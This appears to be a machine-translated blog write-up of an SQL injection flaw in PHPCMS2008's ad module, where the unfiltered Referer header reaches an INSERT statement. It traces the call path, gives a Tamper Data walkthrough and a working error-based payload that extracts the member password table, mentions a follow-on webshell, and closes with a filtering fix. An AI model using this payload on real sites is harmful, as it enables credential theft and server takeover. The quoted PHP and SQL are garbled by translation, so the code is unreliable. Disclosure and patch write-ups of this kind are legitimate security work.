PHPCMS2008 AD template SQL injection vulnerability Repair _php instance

00 Description of vulnerability

PHPCMS2008 due to the advertising module referer LAX, resulting in a SQL injection vulnerability. You can get the administrator username and password, the attacker may gain access to the background after the Webshell, the server for further infiltration.

01 Vulnerability Analysis

Where the vulnerability is generated:

In the Show method of /ads/include/ads_place.class.php .

Function Show ($placeid) ...
if ($adses [0][' option '])
{
foreach ($adses as $ads)
{
$contents [] = Ads_content ($ads, 1);
$this->db->query ("INSERT into$this->stat_table" (' adsid ', ' username ', ' ip ', ' referer ', ' clicktime ', ' type ') VALUES (' $ads [Adsid] ', ' $_username ', ' $ip ', ' $this->referrer ', ' $time ',, ' 0 '));
$template = $ads [' template ']? $ads [' template ']: ' Ads ';
}
...

In SQL statements

$this->db->query ("INSERT into$this->stat_table" (' adsid ', ' username ', ' ip ', ' referer ', ' clicktime ', ' type ') VALUES (' $ads [Adsid] ', ' $_username ', ' $ip ', ' $this->referrer ', ' $time ',, ' 0 '));

Here $this->referrer Pass The This method inserts the Referer field in the HTTP request header directly into the database without any filtering. (This method is directly encapsulated within the PHPCMS).

So now that you've found the point of vulnerability, the next step is to find a user-controllable page that contains vulnerabilities. If the vulnerability is not controlled by users, such as only the administrator to use, it is quite a chicken.

Here's how to use backtracking to see which pages call it.

Page/ads/include/commom.inc.php

<?php ...
Require mod_root. ' include/ads_place.class.php ';
Require mod_root. ' include/ads.class.php ';
...
? >

Looking up to see who called the/ads/include/commom.inc.php

In the/ads/ad.php file

<?php ...
Require './include/common.inc.php ';
...
? >

The ad.php file is a user-controllable file, but ad.php is sometimes inaccessible and continues to look up/data/js.php

<?php
chdir ('.. /ads/');
Require './ad.php ';
? >

When a user accesses the home page, js.php is invoked, through which the harmful fields can be submitted, and then through layers of calls, passing in fields Referer to Dangerous method show, introducing SQL injection attacks.

02 Vulnerability Utilization

There are many ways to modify the Referer field in the request header, such as Burpsuite,tamper Data ...

This is directly modified using Firefox's tamper data:

Click Start Tamper, and then visit http://your-addr/data/js.php?id=1

At this time tamper data will jump out, in the right box, right-click, add an element value to fill payload

Referer=1 ', (select 1 from (SELECT COUNT (*), concat (Floor (rand (0) *2), char (45,45,45), (select password from phpcms_member Limit 1)) (A from Information_schema.tables group by a) b), ' 0 ') #

Here I explain: because the SQL statement of the vulnerability is that the insert is not payload, so you can use the blinds, where the floor error injection is used. Floor Error Injection principle please refer to: floor function usage

To bring this payload into the SQL statement is:

$this->db->query ("INSERT into$this->stat_table" (' adsid ', ' username ', ' ip ', ' referer ', ' clicktime ', ' type ') VALUES (' $ads [Adsid] ', ' $_username ', ' $ip ', ' 1 ', ' $time ', (select 1 from (SELECT COUNT (*), concat (Floor (rand (0) *2), char ( 45,45,45), (SELECT password from phpcms_member limit 1))-A from Information_schema.tables group by (a) b), ' 0 ') #, ' 0 ') ');

03 Vulnerability Fixes

Filter the related fields.

$referer = Safe_replace ($this->referer);
$this->db->query ("INSERT into $this->stat_table" (' adsid ', ' username ', ' ip ', ' referer ', ' clicktime ', ' type ') VALUES (' $ads [Adsid] ', ' $_username ', ' $ip ', ' $referer ', ' $time ', ' 0 '));
$template = $ads [' template ']? $ads [' template ']: ' ads ';

Here Safe_replace is the filtering function of the PHPCMS2008 package.

The above is a small set to introduce the PHPCMS2008 ads template SQL injection loopholes, I hope to help you, if you have any questions please give me a message, small series will promptly reply to everyone. Here also thank you very much for the cloud Habitat Community website support!